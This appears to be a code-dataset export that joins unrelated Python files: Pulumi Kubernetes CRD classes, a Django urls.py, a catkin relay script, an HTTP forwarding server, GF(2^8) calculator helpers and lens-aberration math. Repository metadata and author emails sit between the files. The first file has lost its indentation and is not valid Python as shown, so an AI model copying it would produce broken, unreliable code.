def default_ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "default_ttl", value)
@property
@pulumi.getter(name="routeSelector")
def route_selector(self) -> Optional[pulumi.Input['GlobalRouteDiscoverySpecRouteSelectorArgs']]:
"""
        RouteSelector is the selector that selects the global routes; this also allows you to define local routes.
"""
return pulumi.get(self, "route_selector")
@route_selector.setter
def route_selector(self, value: Optional[pulumi.Input['GlobalRouteDiscoverySpecRouteSelectorArgs']]):
pulumi.set(self, "route_selector", value)
@pulumi.input_type
class GlobalRouteDiscoverySpecClustersArgs:
def __init__(__self__, *,
cluster_credential_ref: pulumi.Input['GlobalRouteDiscoverySpecClustersClusterCredentialRefArgs'],
cluster_name: pulumi.Input[str]):
"""
        ClusterReference contains the information necessary to connect to a cluster
        :param pulumi.Input['GlobalRouteDiscoverySpecClustersClusterCredentialRefArgs'] cluster_credential_ref: CredentialsSecretRef is a reference to a secret containing the credentials to access the cluster; a key called "kubeconfig" containing a valid kubeconfig file for connecting to the cluster must exist in this secret.
:param pulumi.Input[str] cluster_name: ClusterName name of the cluster to connect to.
"""
pulumi.set(__self__, "cluster_credential_ref", cluster_credential_ref)
pulumi.set(__self__, "cluster_name", cluster_name)
@property
@pulumi.getter(name="clusterCredentialRef")
def cluster_credential_ref(self) -> pulumi.Input['GlobalRouteDiscoverySpecClustersClusterCredentialRefArgs']:
"""
        CredentialsSecretRef is a reference to a secret containing the credentials to access the cluster; a key called "kubeconfig" containing a valid kubeconfig file for connecting to the cluster must exist in this secret.
"""
return pulumi.get(self, "cluster_credential_ref")
@cluster_credential_ref.setter
def cluster_credential_ref(self, value: pulumi.Input['GlobalRouteDiscoverySpecClustersClusterCredentialRefArgs']):
pulumi.set(self, "cluster_credential_ref", value)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> pulumi.Input[str]:
"""
ClusterName name of the cluster to connect to.
"""
return pulumi.get(self, "cluster_name")
@cluster_name.setter
def cluster_name(self, value: pulumi.Input[str]):
pulumi.set(self, "cluster_name", value)
@pulumi.input_type
class GlobalRouteDiscoverySpecClustersClusterCredentialRefArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
namespace: pulumi.Input[str]):
"""
        CredentialsSecretRef is a reference to a secret containing the credentials to access the cluster; a key called "kubeconfig" containing a valid kubeconfig file for connecting to the cluster must exist in this secret.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "namespace", namespace)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@pulumi.input_type
class GlobalRouteDiscoverySpecGlobalZoneRefArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None):
"""
GlobalZoneRef represents the global zone that will be used to host this record
:param pulumi.Input[str] name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?
"""
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class GlobalRouteDiscoverySpecRouteSelectorArgs:
def __init__(__self__, *,
match_expressions: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoverySpecRouteSelectorMatchExpressionsArgs']]]] = None,
match_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
        RouteSelector is the selector that selects the global routes; this also allows you to define local routes.
:param pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoverySpecRouteSelectorMatchExpressionsArgs']]] match_expressions: matchExpressions is a list of label selector requirements. The requirements are ANDed.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] match_labels: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
if match_expressions is not None:
pulumi.set(__self__, "match_expressions", match_expressions)
if match_labels is not None:
pulumi.set(__self__, "match_labels", match_labels)
@property
@pulumi.getter(name="matchExpressions")
def match_expressions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoverySpecRouteSelectorMatchExpressionsArgs']]]]:
"""
matchExpressions is a list of label selector requirements. The requirements are ANDed.
"""
return pulumi.get(self, "match_expressions")
@match_expressions.setter
def match_expressions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoverySpecRouteSelectorMatchExpressionsArgs']]]]):
pulumi.set(self, "match_expressions", value)
@property
@pulumi.getter(name="matchLabels")
def match_labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
return pulumi.get(self, "match_labels")
@match_labels.setter
def match_labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "match_labels", value)
@pulumi.input_type
class GlobalRouteDiscoverySpecRouteSelectorMatchExpressionsArgs:
def __init__(__self__, *,
key: pulumi.Input[str],
operator: pulumi.Input[str],
values: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
:param pulumi.Input[str] key: key is the label key that the selector applies to.
:param pulumi.Input[str] operator: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
:param pulumi.Input[Sequence[pulumi.Input[str]]] values: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "operator", operator)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
key is the label key that the selector applies to.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def operator(self) -> pulumi.Input[str]:
"""
operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
"""
return pulumi.get(self, "operator")
@operator.setter
def operator(self, value: pulumi.Input[str]):
pulumi.set(self, "operator", value)
@property
@pulumi.getter
def values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
return pulumi.get(self, "values")
@values.setter
def values(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "values", value)
@pulumi.input_type
class GlobalRouteDiscoveryStatusArgs:
def __init__(__self__, *,
cluster_reference_statuses: Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoveryStatusClusterReferenceStatusesArgs']]]]]] = None,
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoveryStatusConditionsArgs']]]] = None):
"""
GlobalRouteDiscoveryStatus defines the observed state of GlobalRouteDiscovery
        :param pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoveryStatusClusterReferenceStatusesArgs']]]]] cluster_reference_statuses: ClusterReferenceStatuses contains the status of the cluster reference connections and their latest reconcile.
:param pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoveryStatusConditionsArgs']]] conditions: ReconcileStatus this is the general status of the main reconciler
"""
if cluster_reference_statuses is not None:
pulumi.set(__self__, "cluster_reference_statuses", cluster_reference_statuses)
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
@property
@pulumi.getter(name="clusterReferenceStatuses")
def cluster_reference_statuses(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoveryStatusClusterReferenceStatusesArgs']]]]]]:
"""
        ClusterReferenceStatuses contains the status of the cluster reference connections and their latest reconcile.
"""
return pulumi.get(self, "cluster_reference_statuses")
@cluster_reference_statuses.setter
def cluster_reference_statuses(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoveryStatusClusterReferenceStatusesArgs']]]]]]):
pulumi.set(self, "cluster_reference_statuses", value)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoveryStatusConditionsArgs']]]]:
"""
ReconcileStatus this is the general status of the main reconciler
"""
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalRouteDiscoveryStatusConditionsArgs']]]]):
pulumi.set(self, "conditions", value)
@pulumi.input_type
class GlobalRouteDiscoveryStatusClusterReferenceStatusesArgs:
def __init__(__self__, *,
status: pulumi.Input[str],
type: pulumi.Input[str],
last_transition_time: Optional[pulumi.Input[str]] = None,
message: Optional[pulumi.Input[str]] = None,
reason: Optional[pulumi.Input[str]] = None):
"""
Condition represents an observation of an object's state. Conditions are an extension mechanism intended to be used when the details of an observation are not a priori known or would not apply to all instances of a given Kind.
Conditions should be added to explicitly convey properties that users and components care about rather than requiring those properties to be inferred from other observations. Once defined, the meaning of a Condition can not be changed arbitrarily - it becomes part of the API, and has the same backwards- and forwards-compatibility concerns of any other part of the API.
:param pulumi.Input[str] type: ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
:param pulumi.Input[str] reason: ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "type", type)
if last_transition_time is not None:
pulumi.set(__self__, "last_transition_time", last_transition_time)
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def status(self) -> pulumi.Input[str]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: pulumi.Input[str]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="lastTransitionTime")
def last_transition_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "last_transition_time")
@last_transition_time.setter
def last_transition_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_transition_time", value)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
"""
ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@pulumi.input_type
class GlobalRouteDiscoveryStatusConditionsArgs:
def __init__(__self__, *,
status: pulumi.Input[str],
type: pulumi.Input[str],
last_transition_time: Optional[pulumi.Input[str]] = None,
message: Optional[pulumi.Input[str]] = None,
reason: Optional[pulumi.Input[str]] = None):
"""
Condition represents an observation of an object's state. Conditions are an extension mechanism intended to be used when the details of an observation are not a priori known or would not apply to all instances of a given Kind.
Conditions should be added to explicitly convey properties that users and components care about rather than requiring those properties to be inferred from other observations. Once defined, the meaning of a Condition can not be changed arbitrarily - it becomes part of the API, and has the same backwards- and forwards-compatibility concerns of any other part of the API.
:param pulumi.Input[str] type: ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
:param pulumi.Input[str] reason: ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "type", type)
if last_transition_time is not None:
pulumi.set(__self__, "last_transition_time", last_transition_time)
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def status(self) -> pulumi.Input[str]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: pulumi.Input[str]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="lastTransitionTime")
def last_transition_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "last_transition_time")
@last_transition_time.setter
def last_transition_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_transition_time", value)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
"""
ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
|
[
"albertzhong0@gmail.com"
] |
albertzhong0@gmail.com
|
0de7cdead8175527fa8a750aa83596e7d6c12382
|
112e36f1d83f53f069ded59d5f5278695146c2e7
|
/profiles_api/urls.py
|
8069267e307ac52fb9764927d07a1d6dc7dd117e
|
[
"MIT"
] |
permissive
|
Labofprojects/profiles-rest-api
|
25b96bf937d1c232f15eb6c5c118af2d15bdcde9
|
6c7af13578b7212b0f89f5cf94cb4183aa32e739
|
refs/heads/master
| 2022-12-14T01:07:59.008206
| 2020-09-18T20:22:13
| 2020-09-18T20:22:13
| 293,630,399
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 494
|
py
|
from django.urls import path, include
from rest_framework.routers import DefaultRouter
from profiles_api import views
router = DefaultRouter()
router.register('hello-viewset', views.HelloViewSet, base_name='hello-viewset')
router.register('profile', views.UserProfileViewSet)
router.register('feed', views.UserProfileFeedViewSet)
urlpatterns = [
path('hello-view/', views.HelloApiView.as_view()),
path('login/', views.UserLoginApiView.as_view()),
path('',include(router.urls))
]
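# For reference, DefaultRouter derives reversible route names from each
# registration; a sketch assuming DRF's default "<basename>-list" /
# "<basename>-detail" naming (and that the profile viewset's queryset
# model is UserProfile), kept commented since reverse() cannot run while
# this URLconf is still being imported:
# from django.urls import reverse
# reverse('hello-viewset-list')
# reverse('userprofile-detail', args=[1])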
|
[
"abiola282@gmail.com"
] |
abiola282@gmail.com
|
0e5545df342496d1bed9121d5cfa49b7b1880e03
|
8d7b36a812cdb90c142ec7b76f033028504abac2
|
/devel/bin/kalibr_calibrate_cameras
|
9a20725f27b8e73360b7a2466c35f311a4ab40f1
|
[] |
no_license
|
FanBowo/StageKalibr
|
6495c130267cc52aa0880311125109f8f3b8a2ae
|
b945780af34dfb55b10a2a613540663cfe9b6ce3
|
refs/heads/master
| 2020-06-04T09:26:13.720113
| 2019-06-18T08:33:17
| 2019-06-18T08:33:17
| 191,964,604
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 861
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# generated from catkin/cmake/template/script.py.in
# creates a relay to a python script source file, acting as that file.
# The purpose is that of a symlink
python_script = '/home/fanzhuzhi/kalibr_workspace/src/Kalibr/aslam_offline_calibration/kalibr/python/kalibr_calibrate_cameras'
import sys
sys.path.append(r"/home/fanzhuzhi/kalibr_workspace/src/Kalibr")
sys.path.append(r"/home/fanzhuzhi/kalibr_workspace/build")
sys.path.append(r"/home/fanzhuzhi/kalibr_workspace/devel/lib")
sys.path.append(r"/usr/lib/python2.7/dist-packages")
with open(python_script, 'r') as fh:
context = {
'__builtins__': __builtins__,
'__doc__': None,
'__file__': python_script,
'__name__': __name__,
'__package__': None,
}
exec(compile(fh.read(), python_script, 'exec'), context)
|
[
"389049674@qq.com"
] |
389049674@qq.com
|
|
cae725be9eeff25dab9597edc2e9b9a2b1b98a77
|
1558b917e2bea49671fceb140682908c39811af5
|
/python-testing/applications/factorial.py
|
8d535a2a9782d82297de14ab59e7fe4cd5f507bf
|
[] |
no_license
|
PhillipHage202/python-testing
|
279a95461b5898efd0d686ba3667834002766b8b
|
7bc4ee51410e3583e691ba10962441ec5fd9de7e
|
refs/heads/main
| 2023-01-03T11:13:50.041892
| 2020-10-29T12:15:16
| 2020-10-29T12:15:16
| 308,311,202
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 77
|
py
|
def fact(x):
    # x! for non-negative integers; the recursion does not terminate for x < 0
    if x == 0:
        return 1
    return x * fact(x - 1)
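# Quick sanity checks for the recursion above, verified by hand:
assert fact(0) == 1
assert fact(5) == 120  # 5 * 4 * 3 * 2 * 1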
|
[
"noreply@github.com"
] |
PhillipHage202.noreply@github.com
|
17f86ecec096e42846a93f4637df06465d85b691
|
5c3d25b7ad5067a1b4ede348b9c7d0a721c77606
|
/Servers/HTTPServer.py
|
b4a204f15aa4c4aa013be818af398a5616e6b005
|
[
"MIT"
] |
permissive
|
eranshmuely/pylmany
|
4265c4a4ef17281c7af5a2fc6577bcd0bc1d6be0
|
7d045917ee5f840c85345586b79d9b2cbb539879
|
refs/heads/master
| 2021-06-19T16:12:15.272767
| 2017-05-07T18:42:17
| 2017-05-07T19:03:09
| 56,405,795
| 4
| 1
| null | 2017-05-07T21:47:08
| 2016-04-16T21:13:13
|
Python
|
UTF-8
|
Python
| false
| false
| 2,505
|
py
|
import Clients.HTTPClient
import httplib
from Servers.AbstractServer import *
import BaseHTTPServer
class HTTPServer(AbstractServer):
def __init__(self, client, listen_addr='', listen_port=8080, auto_start=True):
self.httpd = BaseHTTPServer.HTTPServer((listen_addr, listen_port), self.make_request_handler)
super(HTTPServer, self).__init__(client, listen_addr, listen_port, auto_start)
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def __init__(self, http_server, *args):
self.http_server = http_server # type: HTTPServer
BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args)
def do_handle(self):
content_length = int(self.headers.getheader('content-length', 0))
body = self.rfile.read(content_length) if content_length > 0 else ''
self.http_server.active_connection = self
if isinstance(self.http_server.client, Clients.HTTPClient.HTTPClient):
self.http_server.forward(Clients.HTTPClient.HTTPRequest(self.command, self.path, body, self.headers.dict))
else:
self.http_server.forward(body)
def do_GET(self): self.do_handle()
def do_POST(self): self.do_handle()
def do_PUT(self): self.do_handle()
def do_DELETE(self): self.do_handle()
def do_TRACE(self): self.do_handle()
def do_PATCH(self): self.do_handle()
def log_message(self, format, *args):
pass
def make_request_handler(self, *args):
return self.RequestHandler(self, *args)
def initialize(self, client, listen_addr, listen_port):
self.socket = self.httpd.socket
def protocol_respond(self, data, conn):
""" :type conn BaseHTTPServer.BaseHTTPRequestHandler """
if isinstance(data, httplib.HTTPResponse):
conn.send_response(int(data.status))
for header, value in data.getheaders():
if not header.lower() == 'content-length':
conn.send_header(header, value)
body = data.read()
conn.send_header('content-length', len(body))
conn.end_headers()
conn.wfile.write(body)
elif isinstance(data, basestring):
conn.send_response(200)
conn.send_header('content-length', len(data))
conn.end_headers()
conn.wfile.write(data)
def on_receive(self, sock):
self.httpd._handle_request_noblock()
|
[
"yaniv2005@gmail.com"
] |
yaniv2005@gmail.com
|
2944de398b1822a76566f8be50e28a1b0c8f5843
|
a523dce5cc7ef4ecf5706b7b7c9d9c32249d61ec
|
/Average List/Average.py
|
533e895be659260b0cb9d97d3ed0e604c5ea4a84
|
[] |
no_license
|
DylanTrull/cs362HW4
|
21c8cb1fcd24b2136f83659f8c2763d480aa7add
|
13b77ba9ea7d29cd729ecc36f57fc1585205a9f7
|
refs/heads/master
| 2023-04-20T05:19:56.044929
| 2021-05-03T21:42:52
| 2021-05-03T21:42:52
| 364,045,860
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 59
|
py
|
def Average(list):  # note: the parameter name shadows the built-in list()
    avg = sum(list) / len(list)
    return avg
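# Example: mean of a small list; an empty list raises ZeroDivisionError.
assert Average([1, 2, 3]) == 2.0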
|
[
"trulld@oregonstate.edu"
] |
trulld@oregonstate.edu
|
5fa3e0efd2a714a9174b20907da6812b4303c5bb
|
68f98406799a2ce4b61d7145fab7d5572dc80bc0
|
/Lista01/Calculator/aux.py
|
7fbf683d970a57e152bedd90f0762428fb3c52b1
|
[] |
no_license
|
bernardohrl/Criptografia_2019_01
|
ff6b143441abf40a2550f7fbe2bf0ba0987a1f29
|
80f8061379bdf5f0d8e6c26b186dd4af22214124
|
refs/heads/master
| 2020-05-16T08:02:10.632862
| 2019-05-29T19:11:38
| 2019-05-29T19:11:38
| 182,896,085
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,632
|
py
|
def dec_to_binary(num):
binary_string = str(bin(int(num, 10))[2:].zfill(8))
return binary_string
def get_correct_number(numero):
while(int(numero) < 0 or int(numero) > 255):
        print('\nInvalid range, choose a number between 0 and 255')
        print('Enter it again: ', end='')
numero = input()
return numero
def get_correct_operation(operacao):
while(int(operacao) < 1 or int(operacao) > 4):
        print('\nChoose one of the options shown (1 to 4).')
        print('Enter it again: ', end='')
operacao = input()
return int(operacao)
def check_values(n1, n2, operacao):
print('\n\nnum1: ' + n1)
print('num2: ' + n2)
    print('option: ' + str(operacao))
def get_polynomn(number):
result = ''
if(number == '00000000'):
return '0'
for index, bit in enumerate(number):
coeficient = (7-index)
if bit == '1':
if result == '':
result += ('x^' + str(coeficient))
elif coeficient == 1:
result += ' + x'
elif coeficient == 0:
result += ' + 1'
else:
result += (' + x^' + str(coeficient))
return(result)
def get_coeficient(dividend, divisor):
index_n1 = dividend.find('1')
index_n2 = divisor.find('1')
    coeficient = index_n2 - index_n1  # power needed for the divisor to reach the dividend
    multiplied = divisor[coeficient:] + divisor[:coeficient]  # performs the multiplication by x^power
return coeficient, multiplied
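# Worked example for the helpers above: the byte '00010011' has bits set
# at powers 4, 1 and 0, i.e. the polynomial x^4 + x + 1.
assert dec_to_binary('19') == '00010011'
assert get_polynomn('00010011') == 'x^4 + x + 1'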
|
[
"bernardohrl.unb@gmail.com"
] |
bernardohrl.unb@gmail.com
|
a4f12c4b29d2340cd130c0dde351cb61e552d08b
|
3b063a3dd3c0e255a8cb17dde0bf45527a36f861
|
/forward.py
|
01a27a72d812b9eee5cbff342ce6fe9354474ec4
|
[] |
no_license
|
FWin22/Misc
|
704cf50a4cc14fd879faa1e35ecf3f76c6990b13
|
6b247eb5ddeaa383af29e6918a2d9b1ea299e03b
|
refs/heads/master
| 2021-07-19T23:24:52.239842
| 2021-01-11T10:27:39
| 2021-01-11T10:27:39
| 233,248,496
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,559
|
py
|
import numpy as np
import math
import jutil.diff as jdiff
from jutil import fft
from scipy.sparse import identity
def create_empty_aber_dict():
"""
Resets all aberrations to zero.
"""
aberrations = {'A0': 0. + 1j * 0., 'A1': 0. + 1j * 0., 'C1': 0. + 1j * 0.,
'A2': 0. + 1j * 0., 'B2': 0. + 1j * 0., 'A3': 0. + 1j * 0.,
'C3': 0. + 1j * 0., 'S3': 0. + 1j * 0., 'A4': 0. + 1j * 0.,
'B4': 0. + 1j * 0., 'D4': 0. + 1j * 0., 'C5': 0. + 1j * 0.}
return aberrations
def chi(wavelength, w, aberrations):
"""
Returns aberration function chi(w). All aberrations are in nm.
Aberrations
----------
A0 : complex, optional
Image Shift
C1 : float, optional
Defocus
A1 : complex, optional
2-fold-astigmatism
A2 : complex, optional
3-fold-astigmatism
B2 : complex, optional
Axial coma
C3 : float, optional
Spherical aberration
A3 : complex, optional
4-fold-astigmatism
S3 : complex, optional
Star aberration
A4 : complex, optional
5-fold-astigmatism
B4 : complex, optional
Axial coma
D4 : complex, optional
Three lobe aberration
C5 : float, optional
Spherical aberration
"""
w_c = np.conjugate(w)
chi_i = {}
chi_i['A0'] = aberrations['A0'] * w_c
chi_i['C1'] = aberrations['C1'] * w * w_c / 2
chi_i['A1'] = (aberrations['A1'] * w_c ** 2) / 2
chi_i['B2'] = aberrations['B2'] * w * w_c ** 2
chi_i['A2'] = (aberrations['A2'] * w_c ** 3) / 3
chi_i['A3'] = (aberrations['A3'] * w_c ** 4) / 4
chi_i['C3'] = (aberrations['C3'] * w * w * w_c * w_c) / 4
chi_i['S3'] = aberrations['S3'] * w * w_c ** 3
chi_i['A4'] = (aberrations['A4'] * w_c ** 5) / 5
chi_i['B4'] = aberrations['B4'] * w ** 2 * w_c ** 3
chi_i['D4'] = aberrations['D4'] * w * w_c ** 4
chi_i['C5'] = (aberrations['C5'] * w ** 3 * w_c ** 3) / 6
chi_sum = 0 * w
for key in chi_i.keys():
chi_sum += chi_i[key]
return (2 * math.pi / wavelength) * np.real(chi_sum)
def diff_chi_ab(wavelength, w, aber_list, gmax):
w_c = np.conjugate(w)
chi_i = {}
chi_i['A0'] = w_c
chi_i['C1'] = (w * w_c) / 2
chi_i['A1'] = (w_c ** 2) / 2
chi_i['B2'] = w * w_c ** 2
chi_i['A2'] = (w_c ** 3) / 3
chi_i['A3'] = (w_c ** 4) / 4
chi_i['C3'] = (w * w * w_c * w_c) / 4
chi_i['S3'] = w * w_c ** 3
chi_i['A4'] = (w_c ** 5) / 5
chi_i['B4'] = w ** 2 * w_c ** 3
chi_i['D4'] = w * w_c ** 4
chi_i['C5'] = (w ** 3 * w_c ** 3) / 6
a = []
for i, ab in enumerate(aber_list):
if gmax:
dx = (2 * math.pi / wavelength * np.real(chi_i[ab]) * pi_4th(ab, wavelength, gmax))
dy = (2 * math.pi / wavelength * np.real(1j*chi_i[ab]) * pi_4th(ab, wavelength, gmax))
else:
dx = (2 * math.pi / wavelength * np.real(chi_i[ab]) )
dy = (2 * math.pi / wavelength * np.real(1j * chi_i[ab]))
a.append(dx)
a.append(dy)
a = np.asarray(a)
return a.T
def diff_chi_x_ab(wavelength, w, aber_list, gmax=None):
x = np.real(w).copy()
y = np.imag(w).copy()
w_c = np.conjugate(w)
chi_i = {}
chi_i['A0'] = np.zeros(w.shape, dtype='complex128') #np.ones(w.shape, dtype='complex128')
chi_i['A1'] = w_c
chi_i['A2'] = w_c ** 2
chi_i['A3'] = w_c ** 3
chi_i['A4'] = w_c ** 4
chi_i['C1'] = x
chi_i['C3'] = x * w * w_c
chi_i['C5'] = x * w ** 2 * w_c ** 2
chi_i['B2'] = (3 * x ** 2 + y ** 2 - 2j * x * y)
chi_i['B4'] = w_c ** 2 * (5 * x ** 2 + 6j * x * y - y ** 2)
chi_i['S3'] = 2 * w_c ** 2 * (2 * x + 1j * y)
chi_i['D4'] = w_c ** 3 * (5 * x + 3j * y)
a = []
for i, ab in enumerate(aber_list):
dx = (2 * np.pi / wavelength) * np.real(chi_i[ab]).ravel()
dy = (-2 * np.pi / wavelength) * np.imag(chi_i[ab]).ravel()
a.append(dx)
a.append(dy)
a = np.asarray(a)
return a
def diff_chi_y_ab(wavelength, w, aber_list, gmax=None):
x = np.real(w).copy()
y = np.imag(w).copy()
w_c = np.conjugate(w)
chi_i = {}
chi_i['A0'] = np.zeros(w.shape, dtype='complex128')# (-1j) * np.ones(w.shape,
# dtype='complex128')
chi_i['A1'] = (-1j) * w_c
chi_i['A2'] = (-1j) * w_c ** 2
chi_i['A3'] = (-1j) * w_c ** 3
chi_i['A4'] = (-1j) * w_c ** 4
chi_i['C1'] = y
chi_i['C3'] = y * w * w_c
chi_i['C5'] = y * w ** 2 * w_c ** 2
chi_i['B2'] = (-1j) * (3 * y ** 2 + x ** 2 + 2j * x * y)
chi_i['B4'] = w_c ** 2 * (5j * y ** 2 - 1j * x ** 2 + 6 * x * y)
chi_i['S3'] = 2 * w_c ** 2 * (2 * y - 1j * x)
chi_i['D4'] = w_c ** 3 * (5 * y - 3j * x)
a = []
for i, ab in enumerate(aber_list):
dx = (2 * np.pi / wavelength) * np.real(chi_i[ab]).ravel()
dy = (-2 * np.pi / wavelength) * np.imag(chi_i[ab]).ravel()
a.append(dx)
a.append(dy)
a = np.asarray(a)
return a
def diff_chi_x(wavelength, w, aberrations):
x = np.real(w)
y = np.imag(w)
w_c = np.conjugate(w)
chi_i = {}
chi_i['A0'] = np.zeros(w.shape, dtype='complex128') #aberrations['A0'] * np.ones(w.shape)
chi_i['A1'] = aberrations['A1'] * w_c
